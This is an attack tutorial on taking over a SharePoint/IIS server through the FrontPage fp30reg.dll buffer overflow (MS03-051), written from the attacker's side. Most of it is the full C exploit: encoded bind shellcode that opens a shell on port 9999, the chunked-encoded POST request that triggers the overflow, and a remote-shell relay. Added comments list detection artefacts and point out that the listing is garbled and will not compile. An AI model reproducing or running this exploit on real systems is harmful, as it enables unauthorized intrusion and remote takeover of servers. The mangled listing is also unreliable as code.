
Example SharePoint Hack Using Frontpage Extensions

Most Microsoft hackers will note that the default installation directories, as discussed in other articles, are the quickest way to get hold of a SharePoint site. However, there is other interesting information that can be gathered from the host before you begin your attack, and some pretty common IIS exploits can also help facilitate the takeover. First, let's attempt to execute a buffer overflow on our host; this will hopefully allow us to execute some arbitrary code on the server if everything goes according to plan. The ultimate goal in this case would be to trip a remote buffer overrun due to a flaw in FrontPage Server Extensions; when we complete the overflow we should then have local system rights on the server, and maybe we can even get a new account created so we can visit this server later and see if it can't be a bridge for us to other systems. We are first going to have to send a chunked-encoded request to our host, which should result in output somewhat like:

————————————————————————
Event Type: Warning
Event Source: W3SVC
Event Category: None
Event ID: 2002
Description:
Out of process application ‘/LM/W3SVC/1/ROOT’ terminated unexpectedly.
————————————————————————

You should be able to find this in the event log following our attack on the SharePoint site. Our request will look something like POST /_vti_bin/_vti_aut/fp30reg.dll. A chunked-encoded POST will result in control of ECX and EDI, with the exception occurring at a mov dword ptr [ECX+4],EDI instruction, leading to remote command execution with the privileges associated with the IWAM_machinename account.

We are just going to execute a little code in order to fully trip the overflow and see if we can't get into the server (see the code at the bottom of this article).

If you want to eliminate this vulnerability, just use the IIS Lockdown tool to disable the extensions properly.

  1. ********************************************************************************/
  2.  
  3. #include <stdio.h>
  4. #include <string.h>
  5. #include <winsock.h>
  6. #pragma comment(lib,"ws2_32")
  7.  
  8. #define VER "0.1"
  9.  
/******** bind shellcode spawns persistent shell on port 9999 *****************************/
/*
 * Opaque payload bytes; main() copies the whole array into the request body
 * at data[250+70].  The header line above is the author's claim -- nothing in
 * this listing decodes the bytes -- but main() later connects to TCP port
 * 9999, which is consistent with it.  Treat the blob as untrusted machine
 * code.  From a defender's side the observable artefacts are the POST to
 * /_vti_bin/_vti_aut/fp30reg.dll, the W3SVC Event ID 2002 crash described in
 * the article, and an unexpected listener on TCP/9999 on the web server.
 */
unsigned char kyrgyz_bind_code[] = {
0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88,
0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE,
0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88,
0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88,
0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89,
0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78,
0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77,
0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03,
0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05,
0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98,
0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC,
0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77,
0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03,
0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8,
0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C,
0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0,
0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03,
0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B,
0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03,
0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48,
0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
};
  44.  
/* Relay loop between local stdin/stdout and a connected socket; defined below. */
void cmdshell (int sock);
/* Resolve a dotted quad or hostname to a network-order IPv4 address; exits the process on failure. */
long gimmeip(char *hostname);
  47.  
/*
 * Entry point of the MS03-051 proof-of-concept named in the banner below.
 * Flow: build a chunked-encoded POST to /_vti_bin/_vti_aut/fp30reg.dll whose
 * body is a 0x90-filled buffer with fixed values and kyrgyz_bind_code[]
 * written at fixed offsets; send it; treat a reply whose bytes 9-11 read
 * "100" as "fp30reg.dll present"; pause ~13 s; then connect to TCP/9999 on
 * the same host and hand the socket to cmdshell().
 *
 * argv[1] is the target host (name or dotted quad); optional argv[2] is the
 * port (default 80).  Returns 1 on usage, socket, send/recv or probe
 * failure, 0 after the cmdshell() session ends; resolution and connect
 * failures exit(1) instead.
 *
 * Detection / mitigation (all from the article): the request path and the
 * chunked POST, the W3SVC Event ID 2002 "terminated unexpectedly" entry,
 * and a new listener on TCP/9999; the fix is to disable the FrontPage
 * extensions (IIS Lockdown) and apply MS03-051.
 *
 * NOTE(review): the blog rendering has stripped backslash escapes and the
 * line breaks inside the string literals of this listing (e.g. 'x0' below is
 * a multi-character constant, not NUL, and the HTTP header fields run
 * together), so this copy is not byte-accurate and does not compile as the
 * author intended.
 */
int main(int argc,char *argv[])
{
    WSADATA wsaData;
    struct sockaddr_in targetTCP;
    struct hostent *host;                 /* unused */
    int sockTCP,s;
    unsigned short port = 80;             /* default HTTP port; overridden by argv[2] */
    long ip;
    unsigned char header[]= "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1 ";
    unsigned char packet[3000],data[1500];
    /* Fixed values written over the 0x90 fill below.  As rendered here the
     * backslashes are missing, so these are plain ASCII text, not the bytes
     * the author intended. */
    unsigned char ecx[] = "xe0xf3xd4x67";
    unsigned char edi[] = "xffxd0x90x90";
    unsigned char call[] = "xe4xf3xd4x67";//overwrite .data section of fp30reg.dll
    unsigned char shortjmp[] = "xebx10";

    printf(" -={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=- "
    " by Adik < netmaniac [at] hotmail.KG > ", VER);
    if(argc < 2)
    {

        printf(" Usage: %s [Target] <port> "
        " eg: fp30reg.exe 192.168.63.130 ",argv[0]);
        return 1;
    }
    if(argc==3)
        port = atoi(argv[2]);             /* atoi() reports no error: a non-numeric port silently becomes 0 */
    WSAStartup(0x0202, &wsaData);         /* return value not checked */
    printf("[*] Target: %s Port: %d ",argv[1],port);
    ip=gimmeip(argv[1]);                  /* exits the process if the host cannot be resolved */
    memset(&targetTCP, 0, sizeof(targetTCP));
    memset(packet,0,sizeof(packet));
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(port);
    /* Request line, Host and "Transfer-Encoding: chunked".  The separators
     * between the header fields (presumably CRLFs) were lost in rendering. */
    sprintf(packet,"%sHost: %s Transfer-Encoding: chunked ",header,argv[1]);
    memset(data, 0x90, sizeof(data)-1);   /* body filler */
    data[sizeof(data)-1] = 'x0';          /* rendered as a multi-character constant; intended as the terminator */
    /* fixed-offset overwrites inside the body; offsets are the author's */
    memcpy(&data[16],edi,sizeof(edi)-1);
    memcpy(&data[20],ecx,sizeof(ecx)-1);
    memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
    memcpy(&data[250+14],call,sizeof(call)-1);
    memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
    /* Appends Content-Length plus a single chunk (hex size, body, final "0").
     * `packet` is both the destination and a %s source: an overlapping
     * sprintf() is undefined behaviour in standard C even where a given CRT
     * tolerates it, and %d/%x are handed size_t values from strlen(). */
    sprintf(packet,"%sContent-Length: %d %x %s 0 ",packet,
    strlen(data),strlen(data),data);
    /* Winsock reports INVALID_SOCKET (all bits set); the -1 comparison only
     * holds because the handle is stored in an int -- TODO confirm on Win64 */
    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf("[x] Socket not initialized! Exiting... ");
        WSACleanup();
        return 1;
    }
    printf("[*] Socket initialized... ");
    if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf("[*] Connection to host failed! Exiting... ");
        WSACleanup();
        exit(1);                          /* socket not closed; the process exits anyway */
    }
    printf("[*] Checking for presence of fp30reg.dll...");
    if (send(sockTCP, packet, strlen(packet),0) == -1)   /* a short send is not detected */
    {
        printf("[x] Failed to inject packet! Exiting... ");
        WSACleanup();
        return 1;
    }
    memset(packet,0,sizeof(packet));
    /* The byte count of the reply is discarded.  packet[] was zeroed, so the
     * index test below is memory-safe, but a reply shorter than 12 bytes is
     * reported as "Not Found". */
    if (recv(sockTCP, packet, sizeof(packet),0) == -1)
    {
        printf("[x] Failed to receive packet! Exiting... ");
        WSACleanup();
        return 1;
    }
    /* Presumably the status code of an "HTTP/1.1 100 Continue" reply to the
     * chunked POST (bytes 0-8 being "HTTP/1.1 ") -- confirm against a capture. */
    if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
        printf(" Found! ");
    else
    {
        printf(" Not Found!! Exiting... ");
        WSACleanup();
        return 1;
    }
    printf("[*] Packet injected! ");
    closesocket(sockTCP);
    printf("[*] Sleeping ");
    for(s=0;s<13000;s+=1000)              /* 13 x 1 s pause before the follow-up connect */
    {
        printf(". ");
        Sleep(1000);
    }
    printf(" [*] Connecting to host: %s on port 9999",argv[1]);
    if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        printf(" [x] Socket not initialized! Exiting... ");
        WSACleanup();
        return 1;
    }
    targetTCP.sin_family = AF_INET;
    targetTCP.sin_addr.s_addr = ip;
    targetTCP.sin_port = htons(9999);     /* hard-coded; matches the port the payload's header comment claims */
    if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
    {
        printf(" [x] Exploit failed or there is a Firewall! Exiting... ");
        WSACleanup();
        exit(1);
    }
    printf(" [*] Dropping to shell... ");
    cmdshell(sockTCP);                    /* returns once either side closes; sockTCP is never closesocket()'d */
    return 0;
}
  155. /*********************************************************************************/
/*
 * Interactive relay: shuttles bytes between local stdin/stdout and the
 * connected socket `sock` until either side closes.
 *
 * Each iteration polls the socket for readability with a 1 s timeout.  If it
 * is readable, one recv() is copied to stdout (fd 1); otherwise one read()
 * from stdin (fd 0) is sent to the socket.  Because read(0, ...) blocks,
 * socket output is only drained between lines of local input.  Any failed or
 * zero-length transfer prints "Connection closed.", calls WSACleanup() and
 * returns; `sock` itself is never closesocket()'d here.
 *
 * read()/write() on fds 0/1 are CRT POSIX-style calls; no <io.h> appears in
 * this listing, so they presumably compile via implicit declaration on the
 * author's toolchain -- TODO confirm.
 */
void cmdshell (int sock)
{
    struct timeval tv;
    int length;
    unsigned long o[2];
    char buffer[1000];

    /* Set once: presumably relies on Winsock leaving the timeout untouched;
     * POSIX select() may modify it -- confirm before porting. */
    tv.tv_sec = 1;
    tv.tv_usec = 0;

    while (1)
    {
        /* Hand-rolled Winsock fd_set: {fd_count = 1, fd_array[0] = sock}.
         * Relies on the Win32 layout (u_int count followed by the SOCKET
         * array) and on SOCKET fitting in an unsigned long; on a 64-bit build
         * SOCKET is wider and padded, so this would break -- TODO confirm. */
        o[0] = 1;
        o[1] = sock;

        length = select (0, (fd_set *)&o, NULL, NULL, &tv);   /* first argument is ignored by Winsock */
        if(length == 1)
        {
            /* socket readable: forward one recv() to stdout */
            length = recv (sock, buffer, sizeof (buffer), 0);
            if (length <= 0)
            {
                printf ("[x] Connection closed. ");
                WSACleanup();
                return;
            }
            length = write (1, buffer, length);
            if (length <= 0)
            {
                printf ("[x] Connection closed. ");
                WSACleanup();
                return;
            }
        }
        else
        {
            /* timeout (or a select() error, which also lands here): block on
             * stdin and send one chunk */
            length = read (0, buffer, sizeof (buffer));
            if (length <= 0)
            {
                printf("[x] Connection closed. ");
                WSACleanup();
                return;
            }
            length = send(sock, buffer, length, 0);
            if (length <= 0)
            {
                printf("[x] Connection closed. ");
                WSACleanup();
                return;
            }
        }
    }

}
  209. /*********************************************************************************/
/*
 * Convert `hostname` to a network-byte-order IPv4 address.
 *
 * inet_addr() is tried first; only when its result is negative when viewed
 * as a long (INADDR_NONE, 0xFFFFFFFF, reads as -1) is gethostbyname()
 * consulted.  On a little-endian build any valid dotted quad whose last
 * octet is >= 128 also reads as negative (network order puts that octet in
 * the top byte) and is needlessly re-resolved -- presumably still yielding
 * the same address via the resolver.
 *
 * On resolution failure the function prints a message, calls WSACleanup()
 * and exit()s with status 1; it never returns an error to the caller.
 * Returns the address as a long.
 */
long gimmeip(char *hostname)
{
    struct hostent *he;
    long ipaddr;

    if ((ipaddr = inet_addr(hostname)) < 0)
    {
        if ((he = gethostbyname(hostname)) == NULL)
        {
            printf("[x] Failed to resolve host: %s! Exiting... ",hostname);
            WSACleanup();
            exit(1);                      /* no error return: failure terminates the process */
        }
        /* copies h_length bytes (4 for AF_INET); fills a 32-bit long exactly,
         * would leave the upper half of an LP64 long unset -- TODO confirm
         * the intended build is 32-bit */
        memcpy(&ipaddr, he->h_addr, he->h_length);
    }
    return ipaddr;
}
  227. /*********************************************************************************/